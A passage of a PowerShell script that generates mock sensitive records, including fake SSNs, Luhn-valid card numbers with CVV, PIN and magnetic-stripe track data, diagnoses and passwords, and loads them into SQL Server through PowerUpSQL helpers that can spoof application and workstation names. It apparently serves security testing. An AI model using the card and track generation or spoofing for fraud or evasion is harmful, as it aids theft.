$DiagnosisList.Rows.Add("Presence of artificial limb (complete) (partial)","Presence of artificial left leg (complete) (partial)") + $null = $DiagnosisList.Rows.Add("Presence of artificial limb (complete) (partial)","Presence of artificial arms, bilateral (complete) (partial)") + $null = $DiagnosisList.Rows.Add("Presence of artificial limb (complete) (partial)","Presence of artificial legs, bilateral (complete) (partial)") + $null = $DiagnosisList.Rows.Add("Presence of dental prosthetic device (complete) (partial)","Presence of dental prosthetic device (complete) (partial)") + $null = $DiagnosisList.Rows.Add("Presence of spectacles and contact lenses","Presence of spectacles and contact lenses") + $null = $DiagnosisList.Rows.Add("Presence of external hearing-aid","Presence of external hearing-aid") + $null = $DiagnosisList.Rows.Add("Presence of (intrauterine) contraceptive device","Presence of (intrauterine) contraceptive device") + $null = $DiagnosisList.Rows.Add("Presence of other specified devices","Presence of other specified devices") + $null = $DiagnosisList.Rows.Add("Other postprocedural states","Intestinal bypass and anastomosis status") + $null = $DiagnosisList.Rows.Add("Other postprocedural states","Arthrodesis status") + $null = $DiagnosisList.Rows.Add("Other postprocedural states","Presence of cerebrospinal fluid drainage device") + $null = $DiagnosisList.Rows.Add("Other postprocedural states","Post therapeutic collapse of lung status") + $null = $DiagnosisList.Rows.Add("Cataract extraction status","Cataract extraction status, right eye") + $null = $DiagnosisList.Rows.Add("Cataract extraction status","Cataract extraction status, left eye") + $null = $DiagnosisList.Rows.Add("Cataract extraction status","Cataract extraction status, unspecified eye") + $null = $DiagnosisList.Rows.Add("Sterilization status","Tubal ligation status") + $null = $DiagnosisList.Rows.Add("Sterilization status","Vasectomy status") + $null = $DiagnosisList.Rows.Add("Angioplasty status","Coronary angioplasty status") + $null = $DiagnosisList.Rows.Add("Angioplasty status","Peripheral vascular angioplasty status") + $null = $DiagnosisList.Rows.Add("Dental procedure status","Dental sealant status") + $null = $DiagnosisList.Rows.Add("Dental procedure status","Dental restoration status") + $null = $DiagnosisList.Rows.Add("Dental procedure status","Other dental procedure status") + $null = $DiagnosisList.Rows.Add("Breast implant status","Breast implant status") + $null = $DiagnosisList.Rows.Add("Filtering (vitreous) bleb after glaucoma surgery status","Filtering (vitreous) bleb after glaucoma surgery status") + $null = $DiagnosisList.Rows.Add("Bariatric surgery status","Bariatric surgery status") + $null = $DiagnosisList.Rows.Add("Transplanted organ removal status","Transplanted organ removal status") + $null = $DiagnosisList.Rows.Add("Personal history of breast implant removal","Personal history of breast implant removal") + $null = $DiagnosisList.Rows.Add("Personal history of in utero procedure","Personal history of in utero procedure during pregnancy") + $null = $DiagnosisList.Rows.Add("Personal history of in utero procedure","Personal history of in utero procedure while a fetus") + $null = $DiagnosisList.Rows.Add("Other specified postprocedural states","Other specified postprocedural states") + $null = $DiagnosisList.Rows.Add("Other specified postprocedural states","History of uterine scar from previous surgery") + $null = $DiagnosisList.Rows.Add("Dependence on enabling machines and devices, not elsewhere classified","Dependence on aspirator") + $null = $DiagnosisList.Rows.Add("Dependence on respirator","Dependence on respirator [ventilator] status") + $null = $DiagnosisList.Rows.Add("Dependence on respirator","Encounter for respirator [ventilator] dependence during power failure") + $null = $DiagnosisList.Rows.Add("Dependence on renal dialysis","Dependence on renal dialysis") + $null = $DiagnosisList.Rows.Add("Dependence on wheelchair","Dependence on wheelchair") + $null = $DiagnosisList.Rows.Add("Dependence on other enabling machines and devices","Dependence on supplemental oxygen") + $null = $DiagnosisList.Rows.Add("Dependence on other enabling machines and devices","Dependence on other enabling machines and devices") + #endregion + + # Generate list counts + $CityCount = $Cities | Measure-Object | Select Count -ExpandProperty Count + $StreetCount = $Streets | Measure-Object | Select Count -ExpandProperty Count + $LastCount = $LastNames | Measure-Object | Select Count -ExpandProperty Count + $FirstCount = $FirstNames | Measure-Object | Select Count -ExpandProperty Count + $DiagnosisCount = $DiagnosisList | Measure-Object | Select Count -ExpandProperty Count + $InsuranceCompaniesCount = $InsuranceCompanies | Measure-Object | Select Count -ExpandProperty Count + } + + process { + + # Generate Data Table + Write-Verbose "Generating mock data set" + $DataRows = 1..$RowCount | + Foreach{ + + # ------------------ + # Generate Row Data + # ------------------ + + # Username + $RandomNum = (-join ((0..99) | Get-Random -Count 10)).substring(0,6) + $Username = "U$RandomNum" + + # Password + $Letters = (-join ((65..90) + (97..122) | Get-Random -Count 8 | % {[char]$_})) + $Numbers = (-join ((0..9) | Get-Random -Count 2)) + $Special = "!!@#$%^&*".ToCharArray(); + $GetSpecial = $Special | Get-Random -Count 1 + $Password = "$Letters$Numbers$GetSpecial" + + # First Name + $FirstNameNum = Get-Random -Maximum $FirstNames.Count + $FirstName = $FirstNames[$FirstNameNum].ToLower() + + # Last Name + $LastNameNum = Get-Random -Maximum $LastNames.count + $LastName = $LastNames[$LastNameNum].ToLower() + + # Get Location + $LocationIndex = Get-Random -Minimum 1 -Maximum $CityCount + $Location = $Cities | Select -Index $LocationIndex + + # State + $State = $Location.State + + # State Abbrev. + $StateAbbr = $Location.State_abbr + + # City + $City = $Location.City + + # Zip code + $ZipCode = $Location.zipcode + + # Street + $StreetIndex = Get-Random -Minimum 1 -Maximum $StreetCount + $Street = ($Streets | Select -Index $StreetIndex).FullStreetName + + # Country + $Country = "US" + + # SSN + # Based on https://github.com/ChrisTruncer/Egress-Assess + $SSN = "$(Get-Random -minimum 100 -maximum 999)-$(Get-Random -minimum 10 -maximum 99)-$(Get-Random -minimum 1000 -maximum 9999)" + + # Credit Card Object + $CCNObject = Generate-CreditCards -number 1 + + # Credit Card Last 4 + $CcnPartial = ([string]$CCNObject.Number).substring(([int]($CCNObject.Number).length - 4),4) + + # Credit Card Full + $CcnFull = $CCNObject.Number + + # Credit Card Brand + $CcnBrand = $CCNObject.Brand + + # Credit Card CVV + $CcnCVV = (-join ((0..9) | Get-Random -Count 10)).substring(0,3) + + # Credit Card Encryption Pin + $CcnPin = (-join ((0..9) | Get-Random -Count 10)).substring(0,4) + + # Expiration Month + $CcnExpMonth = Get-Random -Minimum 1 -Maximum 12 + if(($CcnExpMonth | Measure-Object -Character).characters -eq 1){ + $CcnExpMonth = "0$CcnExpMonth" + } + + # Expiration Year + [string]$CcnExpYear = ((Get-Random -Minimum 1 -Maximum 8)+(Get-Date |select year -expandproperty year)) + + # Credit Card Track 1 + $CcnTrack1 = "%B$CcnFull^" + "$FirstName/$LastName"+"^$CcnExpYear"+"$CcnExpMonth"+"99011200000000000000**$CcnCVV******?*" + + # Credit Card Track 2 + $CcnTrack2 = ";01"+$CcnFull+"=014014100000000000030300" + + # Credit Card Track 3 + $CcnTrack3 = ";01"+$CcnFull+"=014014100000000000030300"+$CcnPin+"0404000$CcnExpYear0$CcnExpMonth=************************==1=0000000000000000?*" + + # Salary - $ + $Salary = Get-Random -Minimum 50000 -Maximum 500000 + + # Bonus - % + $Bonus = (Get-Random -Minimum 10 -Maximum 100).tostring() +"%" + + # Diagnosis + $DiagnosisIndex = Get-Random -Minimum 1 -Maximum $DiagnosisCount + $DiagnosisSelected = $DiagnosisList | Select -Index $DiagnosisIndex + $Diagnosis = $DiagnosisSelected.Diagnosis + + # Medical Insurance Company + # https://raw.githubusercontent.com/BloombergGraphics/2017-health-insurer-exits-data/master/data/hios-ids.csv + $InsuranceIndex = Get-Random -Minimum 1 -Maximum $InsuranceCompaniesCount + $InsuranceCompany = $InsuranceCompanies | Select -Index $InsuranceIndex |select issuer_name -ExpandProperty issuer_name + + # Swift/BIC Code + $SwiftCode = ((-join ((65..90) + (97..122) | Get-Random -Count 6 | % {[char]$_})).toupper()) + (Get-Random -Minimum 1 -Maximum 9) +((-join ((65..90) + (97..122) | Get-Random -Count 1 | % {[char]$_})).toupper()) + (Get-Random -Minimum 1 -Maximum 9) +((-join ((65..90) + (97..122) | Get-Random -Count 1 | % {[char]$_})).toupper()) + + # ACH Account + [int]$ACHRand = Get-Random -Minimum 8 -Maximum 12 + $ACH = (-join ((0..15) | Get-Random -Count 15)).substring(0,$ACHRand) + + #PatientNum + $PatientNum = (-join ((0..15) | Get-Random -Count 15)).substring(0,6) + + # Invoice Amount + $InvoiceAmount = (-join ((0..15) | Get-Random -Count 15)).substring(0,6) + + # ------------------- + # Generate Row Object + # ------------------- + $Object = New-Object PSObject + $Object | add-member Noteproperty UserName $Username + $Object | add-member Noteproperty Password $Password + $Object | add-member Noteproperty FirstName $FirstName + $Object | add-member Noteproperty LastName $LastName + $Object | add-member Noteproperty State $State + $Object | add-member Noteproperty StateAbbr $StateAbbr + $Object | add-member Noteproperty City $City + $Object | add-member Noteproperty ZipCode $ZipCode + $Object | add-member Noteproperty Street $Street + $Object | add-member Noteproperty Country $Country + $Object | add-member Noteproperty SSN $SSN + $Object | add-member Noteproperty SwiftBIC $SwiftCode + $Object | add-member Noteproperty ACH $ACH + $Object | add-member Noteproperty CreditPart $CcnPartial + $Object | add-member Noteproperty CreditFull $CcnFull + $Object | add-member Noteproperty CardType $CcnBrand + $Object | add-member Noteproperty CVV $CcnCVV + $Object | add-member Noteproperty Pin $CcnPin + $Object | add-member Noteproperty ExpMonth $CcnExpMonth + $Object | add-member Noteproperty ExpYear $CcnExpYear + $Object | add-member Noteproperty Track1 $CcnTrack1 + $Object | add-member Noteproperty Track2 $CcnTrack2 + $Object | add-member Noteproperty Track3 $CcnTrack3 + $Object | add-member Noteproperty Salary $Salary + $Object | add-member Noteproperty Bonus $Bonus + $Object | add-member Noteproperty PatientNum $PatientNum + $Object | add-member Noteproperty Diagnosis $Diagnosis + $Object | add-member Noteproperty Insurance $InsuranceCompany + $Object | add-member Noteproperty Invoice $InvoiceAmount + + # ------------------- + # Return Row Object + # ------------------- + $Object + } + #> + + } + + end { + # ------------------- + # Return Data Table + # ------------------- + if(-not $SuppressOutput) + { + Write-Verbose "Displaying data table" + $DataRows + } + + # ------------------- + # Write to File + # ------------------- + + if($OutCsvFile) + { + Write-Verbose "Writing data rows to $OutCsvFile" + $DataRows | Export-Csv -NoTypeInformation "$OutCsvFile" + Write-Verbose "Done." + } + + # ------------------- + # Write to Database + # ------------------- + + # Check connection + if($SQLLogin -and $SQLPassword -and $SQLInstance){ + + # Verify connection to database + $Result = Get-SQLConnectionTest -Verbose -Instance $SQLInstance -Username $SQLLogin -Password $SQLPassword -SuppressVerbose + $Status = $Result.Status + }else{ + $Status = "" + } + + # Create database + if($Status -eq "Accessible"){ + + if(-not $DatabaseName ){ + $DatabaseName = ((-join ((65..90) + (97..122) | Get-Random -Count 6 | % {[char]$_})).toupper()) + } + Write-Verbose "Creating database named: $DatabaseName" + $Query = "CREATE DATABASE $DatabaseName" + + Get-SqlQuery -Verbose -Instance $SQLInstance -Username $SQLLogin -Password $SQLPassword -Query "$Query" -SuppressVerbose + } + + + # Create Table + if($Status -eq "Accessible") + { + if(-not $TableName ){ + $TableName = ((-join ((65..90) + (97..122) | Get-Random -Count 6 | % {[char]$_})).toupper()) + } + Write-Verbose "Creating table named: $TableName" + + # Define Query + $Query = @" + CREATE TABLE $TableName ( + UserName varchar(max), + Password varchar(max), + FirstName varchar(max), + LastName varchar(max), + State varchar(max), + StateAbbr varchar(max), + City varchar(max), + ZipCode varchar(max), + Street varchar(max), + Country varchar(max), + SSN varchar(max), + SwiftBIC varchar(max), + ACH varchar(max), + CreditPart varchar(max), + CreditFull varchar(max), + CardType varchar(max), + CVV varchar(max), + Pin varchar(max), + ExpMonth varchar(max), + ExpYear varchar(max), + Track1 varchar(max), + Track2 varchar(max), + Track3 varchar(max), + Salary varchar(max), + Bonus varchar(max), + PatientNum varchar(max), + Diagnosis varchar(max), + Insurance varchar(max), + Invoice varchar(max) + ); +"@ + + # Execute Query + Get-SqlQuery -Verbose -Instance $SQLInstance -Username $SQLLogin -Password $SQLPassword -Query "$Query" -SuppressVerbose -Database $DatabaseName + + + # Insert Rows + $RowCount = $DataRows | Measure-Object | Select Count -ExpandProperty Count + Write-Verbose "Inserting $RowCount rows into table named: $TableName" + + $DataRows | + foreach{ + + # Get Row Variables + $UserName = $_.UserName + $Password = $_.Password + $FirstName = $_.FirstName + $LastName = $_.LastName + $State = $_.State + $StateAbbr = $_.StateAbbr + $City = $_.City + $ZipCode = $_.ZipCode + $Street = $_.Street + $Country = $_.Country + $SSN = $_.SSN + $SwiftBIC = $_.SwiftBIC + $ACH = $_.ACH + $CreditPart = $_.CreditPart + $CreditFull = $_.CreditFull + $CardType = $_.CardType + $CVV = $_.CVV + $Pin = $_.Pin + $ExpMonth = $_.ExpMonth + $ExpYear = $_.ExpYear + $Track1 = $_.Track1 + $Track2 = $_.Track2 + $Track3 = $_.Track3 + $Salary = $_.Salary + $Bonus = $_.Bonus + $PatientNum = $_.PatientNum + $Diagnosis = $_.Diagnosis + $Insurance = $_.Insurance + $Invoice = $_.Invoice + + # Define Query + $Query = "INSERT $TableName Values ('" + $UserName + "','" + $Password + "','" + $FirstName + "','" + $LastName + "','" + $State + "','" + $StateAbbr + "','" + $City + "','" + $ZipCode + "','" + $Street + "','" + $Country + "','" + $SSN + "','" + $SwiftBIC + "','" + $ACH + "','" + $CreditPart + "','" + $CreditFull + "','" + $CardType + "','" + $CVV + "','" + $Pin + "','" + $ExpMonth + "','" + $ExpYear + "','" + $Track1 + "','" + $Track2 + "','" + $Track3 + "','" + $Salary + "','" + $Bonus + "','" + $PatientNum + "','" + $Diagnosis + "','" + $Insurance + "','" + $Invoice +"')" + + # Run Query + Get-SqlQuery -Verbose -Instance $SQLInstance -Username $SQLLogin -Password $SQLPassword -Query $Query -SuppressVerbose -Database $DatabaseName -ReturnError + } + } + $Status = "" + } +} + + + +#region Third Party Functions +# ------------------------------------------------------ +# Third Party Functions +# ------------------------------------------------------ + +# ---------------------------------- +# Functions PowerUpSQL +# ---------------------------------- + +# Function: Get-ComputerNameFromInstance +# Author: Scott Sutherland +Function Get-ComputerNameFromInstance +{ + <# + .SYNOPSIS + Parses computer name from a provided instance. + .PARAMETER Instance + SQL Server instance to parse. + .EXAMPLE + PS C:\> Get-ComputerNameFromInstance -Instance SQLServer1\STANDARDDEV2014 + SQLServer1 + #> + [CmdletBinding()] + Param( + [Parameter(Mandatory = $false, + ValueFromPipeline = $true, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'SQL Server instance.')] + [string]$Instance + ) + + # Parse ComputerName from provided instance + If ($Instance) + { + $ComputerName = $Instance.split('\')[0].split(',')[0] + } + else + { + $ComputerName = $env:COMPUTERNAME + } + + Return $ComputerName +} + +# Get-SQLConnectionObject +# Author: Scott Sutherland +Function Get-SQLConnectionObject +{ + <# + .SYNOPSIS + Creates a object for connecting to SQL Server. + .PARAMETER Username + SQL Server or domain account to authenticate with. + .PARAMETER Password + SQL Server or domain account password to authenticate with. + .PARAMETER Credential + SQL Server credential. + .PARAMETER Database + Default database to connect to. + .PARAMETER AppName + Spoof the name of the application you are connecting to SQL Server with. + .PARAMETER WorkstationId + Spoof the name of the workstation/hostname you are connecting to SQL Server with. + .PARAMETER Encrypt + Use an encrypted connection. + .PARAMETER TrustServerCert + Trust the certificate of the remote server. + .EXAMPLE + PS C:\> Get-SQLConnectionObject -Username myuser -Password mypass -Instance server1 -Encrypt Yes -TrustServerCert Yes -AppName "myapp" + StatisticsEnabled : False + AccessToken : + ConnectionString : Server=server1;Database=Master;User ID=myuser;Password=mypass;Connection Timeout=1 ;Application + Name="myapp";Encrypt=Yes;TrustServerCertificate=Yes + ConnectionTimeout : 1 + Database : Master + DataSource : server1 + PacketSize : 8000 + ClientConnectionId : 00000000-0000-0000-0000-000000000000 + ServerVersion : + State : Closed + WorkstationId : Workstation1 + Credential : + FireInfoMessageEventOnUserErrors : False + Site : + Container : + #> + [CmdletBinding()] + Param( + [Parameter(Mandatory = $false, + HelpMessage = 'SQL Server or domain account to authenticate with.')] + [string]$Username, + + [Parameter(Mandatory = $false, + HelpMessage = 'SQL Server or domain account password to authenticate with.')] + [string]$Password, + + [Parameter(Mandatory = $false, + HelpMessage = 'Windows credentials.')] + [System.Management.Automation.PSCredential] + [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, + + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'SQL Server instance to connection to.')] + [string]$Instance, + + [Parameter(Mandatory = $false, + HelpMessage = 'Dedicated Administrator Connection (DAC).')] + [Switch]$DAC, + + [Parameter(Mandatory = $false, + HelpMessage = 'Default database to connect to.')] + [String]$Database, + + [Parameter(Mandatory = $false, + HelpMessage = 'Spoof the name of the application your connecting to the server with.')] + [string]$AppName = "", + + [Parameter(Mandatory = $false, + HelpMessage = 'Spoof the name of the workstation/hostname your connecting to the server with.')] + [string]$WorkstationId = "", + + [Parameter(Mandatory = $false, + HelpMessage = 'Use an encrypted connection.')] + [ValidateSet("Yes","No","")] + [string]$Encrypt = "", + + [Parameter(Mandatory = $false, + HelpMessage = 'Trust the certificate of the remote server.')] + [ValidateSet("Yes","No","")] + [string]$TrustServerCert = "", + + [Parameter(Mandatory = $false, + HelpMessage = 'Connection timeout.')] + [string]$TimeOut = 1 + ) + + Begin + { + # Setup DAC string + if($DAC) + { + $DacConn = 'ADMIN:' + } + else + { + $DacConn = '' + } + + # Set database filter + if(-not $Database) + { + $Database = 'Master' + } + + # Check if appname was provided + if($AppName){ + $AppNameString = ";Application Name=`"$AppName`"" + }else{ + $AppNameString = "" + } + + # Check if workstationid was provided + if($WorkstationId){ + $WorkstationString = ";Workstation Id=`"$WorkstationId`"" + }else{ + $WorkstationString = "" + } + + # Check if encrypt was provided + if($Encrypt){ + $EncryptString = ";Encrypt=Yes" + }else{ + $EncryptString = "" + } + + # Check TrustServerCert was provided + if($TrustServerCert){ + $TrustCertString = ";TrustServerCertificate=Yes" + }else{ + $TrustCertString = "" + } + } + + Process + { + # Check for instance + if ( -not $Instance) + { + $Instance = $env:COMPUTERNAME + } + + # Create connection object + $Connection = New-Object -TypeName System.Data.SqlClient.SqlConnection + + # Set authentcation type - current windows user + if(-not $Username){ + + # Set authentication type + $AuthenticationType = "Current Windows Credentials" + + # Set connection string + $Connection.ConnectionString = "Server=$DacConn$Instance;Database=$Database;Integrated Security=SSPI;Connection Timeout=$TimeOut$AppNameString$EncryptString$TrustCertString$WorkstationString" + } + + # Set authentcation type - provided windows user + if ($username -like "*\*"){ + $AuthenticationType = "Provided Windows Credentials" + + # Setup connection string + $Connection.ConnectionString = "Server=$DacConn$Instance;Database=$Database;Integrated Security=SSPI;uid=$Username;pwd=$Password;Connection Timeout=$TimeOut$AppNameString$EncryptString$TrustCertString$WorkstationString" + } + + # Set authentcation type - provided sql login + if (($username) -and ($username -notlike "*\*")){ + + # Set authentication type + $AuthenticationType = "Provided SQL Login" + + # Setup connection string + $Connection.ConnectionString = "Server=$DacConn$Instance;Database=$Database;User ID=$Username;Password=$Password;Connection Timeout=$TimeOut$AppNameString$EncryptString$TrustCertString$WorkstationString" + } + + # Return the connection object + return $Connection + } + + End + { + } +} + +# Get-SQLConnectionTest +# Author: Scott Sutherland +Function Get-SQLConnectionTest +{ + <# + .SYNOPSIS + Tests if the current Windows account or provided SQL Server login can log into an SQL Server. + .PARAMETER Username + SQL Server or domain account to authenticate with. + .PARAMETER Password + SQL Server or domain account password to authenticate with. + .PARAMETER Credential + SQL Server credential. + .PARAMETER Instance + SQL Server instance to connection to. + .PARAMETER DAC + Connect using Dedicated Admin Connection. + .PARAMETER Database + Default database to connect to. + .PARAMETER TimeOut + Connection time out. + .PARAMETER SuppressVerbose + Suppress verbose errors. Used when function is wrapped. + .EXAMPLE + PS C:\> Get-SQLConnectionTest -Verbose -Instance "SQLSERVER1.domain.com\SQLExpress" + .EXAMPLE + PS C:\> Get-SQLConnectionTest -Verbose -Instance "SQLSERVER1.domain.com,1433" + .EXAMPLE + PS C:\> Get-SQLInstanceDomain | Get-SQLConnectionTest -Verbose + #> + [CmdletBinding()] + Param( + [Parameter(Mandatory = $false, + HelpMessage = 'SQL Server or domain account to authenticate with.')] + [string]$Username, + + [Parameter(Mandatory = $false, + HelpMessage = 'SQL Server or domain account password to authenticate with.')] + [string]$Password, + + [Parameter(Mandatory = $false, + HelpMessage = 'Windows credentials.')] + [System.Management.Automation.PSCredential] + [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, + + [Parameter(Mandatory = $false, + ValueFromPipeline = $true, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'SQL Server instance to connection to.')] + [string]$Instance, + + [Parameter(Mandatory = $false, + ValueFromPipeline = $true, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'IP Address of SQL Server.')] + [string]$IPAddress, + + [Parameter(Mandatory = $false, + HelpMessage = 'IP Address Range In CIDR Format to Audit.')] + [string]$IPRange, + + [Parameter(Mandatory = $false, + HelpMessage = 'Connect using Dedicated Admin Connection.')] + [Switch]$DAC, + + [Parameter(Mandatory = $false, + HelpMessage = 'Default database to connect to.')] + [String]$Database, + + [Parameter(Mandatory = $false, + HelpMessage = 'Connection timeout.')] + [string]$TimeOut, + + [Parameter(Mandatory = $false, + HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] + [switch]$SuppressVerbose + ) + + Begin + { + # Setup data table for output + $TblResults = New-Object -TypeName System.Data.DataTable + $null = $TblResults.Columns.Add('ComputerName') + $null = $TblResults.Columns.Add('Instance') + $null = $TblResults.Columns.Add('Status') + } + + Process + { + # Default connection to local default instance + if(-not $Instance) + { + $Instance = $env:COMPUTERNAME + } + # Split Demarkation Start ^ + # Parse computer name from the instance + $ComputerName = Get-ComputerNameFromInstance -Instance $Instance + + if($IPRange -and $IPAddress) + { + if ($IPAddress.Contains(",")) + { + $ContainsValid = $false + foreach ($IP in $IPAddress.Split(",")) + { + if($(Test-Subnet -cidr $IPRange -ip $IP)) + { + $ContainsValid = $true + } + } + if (-not $ContainsValid) + { + Write-Warning "Skipping $ComputerName ($IPAddress)" + $null = $TblResults.Rows.Add("$ComputerName","$Instance",'Out of Scope') + return + } + } + + if(-not $(Test-Subnet -cidr $IPRange -ip $IPAddress)) + { + Write-Warning "Skipping $ComputerName ($IPAddress)" + $null = $TblResults.Rows.Add("$ComputerName","$Instance",'Out of Scope') + return + } + Write-Verbose "$ComputerName ($IPAddress)" + } + + # Setup DAC string + if($DAC) + { + # Create connection object + $Connection = Get-SQLConnectionObject -Instance $Instance -Username $Username -Password $Password -Credential $Credential -DAC -TimeOut $TimeOut -Database $Database + } + else + { + # Create connection object + $Connection = Get-SQLConnectionObject -Instance $Instance -Username $Username -Password $Password -Credential $Credential -TimeOut $TimeOut -Database $Database + } + + # Attempt connection + try + { + # Open connection + $Connection.Open() + + if(-not $SuppressVerbose) + { + Write-Verbose -Message "$Instance : Connection Success." + } + + # Add record + $null = $TblResults.Rows.Add("$ComputerName","$Instance",'Accessible') + + # Close connection + $Connection.Close() + + # Dispose connection + $Connection.Dispose() + } + catch + { + # Connection failed + if(-not $SuppressVerbose) + { + $ErrorMessage = $_.Exception.Message + Write-Verbose -Message "$Instance : Connection Failed." + Write-Verbose -Message " Error: $ErrorMessage" + } + + # Add record + $null = $TblResults.Rows.Add("$ComputerName","$Instance",'Not Accessible') + } + } + + End + { + # Return Results + $TblResults + } +} + +# Get-SQLQuery +# Author: Scott Sutherland +Function Get-SQLQuery +{ + <# + .SYNOPSIS + Executes a query on target SQL servers. + .PARAMETER Username + SQL Server or domain account to authenticate with. + .PARAMETER Password + SQL Server or domain account password to authenticate with. + .PARAMETER Credential + SQL Server credential. + .PARAMETER Instance + SQL Server instance to connection to. + .PARAMETER DAC + Connect using Dedicated Admin Connection. + .PARAMETER Database + Default database to connect to. + .PARAMETER TimeOut + Connection time out. + .PARAMETER SuppressVerbose + Suppress verbose errors. Used when function is wrapped. + .PARAMETER Threads + Number of concurrent threads. + .PARAMETER Query + Query to be executed on the SQL Server. + .PARAMETER AppName + Spoof the name of the application you are connecting to SQL Server with. + .PARAMETER WorkstationId + Spoof the name of the workstation/hostname you are connecting to SQL Server with. + .PARAMETER Encrypt + Use an encrypted connection. + .PARAMETER TrustServerCert + Trust the certificate of the remote server. + .EXAMPLE + PS C:\> Get-SQLQuery -Verbose -Instance "SQLSERVER1.domain.com\SQLExpress" -Query "Select @@version" -Threads 15 + .EXAMPLE + PS C:\> Get-SQLQuery -Verbose -Instance "SQLSERVER1.domain.com,1433" -Query "Select @@version" -Threads 15 + .EXAMPLE + PS C:\> Get-SQLInstanceDomain | Get-SQLQuery -Verbose -Query "Select @@version" -Threads 15 + #> + [CmdletBinding()] + Param( + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'SQL Server or domain account to authenticate with.')] + [string]$Username, + + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'SQL Server or domain account password to authenticate with.')] + [string]$Password, + + [Parameter(Mandatory = $false, + HelpMessage = 'Windows credentials.')] + [System.Management.Automation.PSCredential] + [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, + + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'SQL Server instance to connection to.')] + [string]$Instance, + + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'SQL Server query.')] + [string]$Query, + + [Parameter(Mandatory = $false, + HelpMessage = 'Connect using Dedicated Admin Connection.')] + [Switch]$DAC, + + [Parameter(Mandatory = $false, + HelpMessage = 'Default database to connect to.')] + [String]$Database, + + [Parameter(Mandatory = $false, + HelpMessage = 'Connection timeout.')] + [int]$TimeOut, + + [Parameter(Mandatory = $false, + HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] + [switch]$SuppressVerbose, + + [Parameter(Mandatory = $false, + HelpMessage = 'Spoof the name of the application your connecting to the server with.')] + [string]$AppName = "", + + [Parameter(Mandatory = $false, + HelpMessage = 'Spoof the name of the workstation/hostname your connecting to the server with.')] + [string]$WorkstationId = "", + + [Parameter(Mandatory = $false, + HelpMessage = 'Use an encrypted connection.')] + [ValidateSet("Yes","No","")] + [string]$Encrypt = "", + + [Parameter(Mandatory = $false, + HelpMessage = 'Trust the certificate of the remote server.')] + [ValidateSet("Yes","No","")] + [string]$TrustServerCert = "", + + [Parameter(Mandatory = $false, + HelpMessage = 'Return error message if exists.')] + [switch]$ReturnError + ) + + Begin + { + # Setup up data tables for output + $TblQueryResults = New-Object -TypeName System.Data.DataTable + } + + Process + { + # Setup DAC string + if($DAC) + { + # Create connection object + $Connection = Get-SQLConnectionObject -Instance $Instance -Username $Username -Password $Password -Credential $Credential -TimeOut $TimeOut -DAC -Database $Database -AppName $AppName -WorkstationId $WorkstationId -Encrypt $Encrypt -TrustServerCert $TrustServerCert + } + else + { + # Create connection object + $Connection = Get-SQLConnectionObject -Instance $Instance -Username $Username -Password $Password -Credential $Credential -TimeOut $TimeOut -Database $Database -AppName $AppName -WorkstationId $WorkstationId -Encrypt $Encrypt -TrustServerCert $TrustServerCert + } + + # Parse SQL Server instance name + $ConnectionString = $Connection.Connectionstring + $Instance = $ConnectionString.split(';')[0].split('=')[1] + + # Check for query + if($Query) + { + # Attempt connection + try + { + # Open connection + $Connection.Open() + + if(-not $SuppressVerbose) + { + Write-Verbose -Message "$Instance : Connection Success." + } + + # Setup SQL query + $Command = New-Object -TypeName System.Data.SqlClient.SqlCommand -ArgumentList ($Query, $Connection) + + # Grab results + $Results = $Command.ExecuteReader() + + # Load results into data table + $TblQueryResults.Load($Results) + + # Close connection + $Connection.Close() + + # Dispose connection + $Connection.Dispose() + } + catch + { + # Connection failed - for detail error use Get-SQLConnectionTest + if(-not $SuppressVerbose) + { + Write-Verbose -Message "$Instance : Connection Failed." + } + + if($ReturnError) + { + $ErrorMessage = $_.Exception.Message + #Write-Verbose " Error: $ErrorMessage" + } + } + } + else + { + Write-Host -InputObject 'No query provided to Get-SQLQuery function.' + Break + } + } + + End + { + # Return Results + if($ReturnError) + { + $ErrorMessage + } + else + { + $TblQueryResults + } + } +} + +# ---------------------------------- +# Functions generate-cc-validated.ps1 +# ---------------------------------- + +# Author: ktaranov +function Get-LuhnChecksum { + <# + .SYNOPSIS + Calculate the Luhn checksum of a number. + .DESCRIPTION + The Luhn algorithm or Luhn formula, also known as the "modulus 10" or "mod 10" algorithm, + is a simple checksum formula used to validate a variety of identification numbers, such as + credit card numbers, IMEI numbers, National Provider Identifier numbers in the US, and + Canadian Social Insurance Numbers. It was created by IBM scientist Hans Peter Luhn. + .EXAMPLE + Get-LuhnChecksum -Number 1234567890123452 + Calculate the Luch checksum of the number. The result should be 60. + .INPUTS + System.UInt64 + .NOTES + Author: Øyvind Kallstad + Date: 19.02.2016 + Version: 1.0 + Dependencies: ConvertTo-Digits + .LINKS + https://en.wikipedia.org/wiki/Luhn_algorithm + https://communary.wordpress.com/ + https://github.com/gravejester/Communary.ToolBox + #> + [CmdletBinding()] + param ( + [Parameter(Mandatory = $true, Position = 0, ValueFromPipeline = $true)] + [ValidateNotNullOrEmpty()] + [uint64] $Number + ) + + $digitsArray = ConvertTo-Digits -Number $Number + [array]::Reverse($digitsArray) + + $sum = 0 + $index = 0 + + foreach ($digit in $digitsArray) { + if (($index % 2) -eq 0) { + $doubledDigit = $digit * 2 + if (-not($doubledDigit -eq 0)) { + $doubleDigitArray = ConvertTo-Digits -Number $doubledDigit + $sum += ($doubleDigitArray | Measure-Object -Sum | Select-Object -ExpandProperty Sum) + } + } + else { + $sum += $digit + } + $index++ + } + Write-Output $sum +} + +# Author: ktaranov +function New-LuhnChecksumDigit { + <# + .SYNOPSIS + Calculate the Luhn checksum digit for a number. + .DESCRIPTION + This function uses the Luhn algorithm to calculate the + Luhn checksum digit for a (partial) number. + .EXAMPLE + New-LuhnChecksumDigit -PartialNumber 123456789012345 + This will get the checksum digit for the number. The result should be 2. + 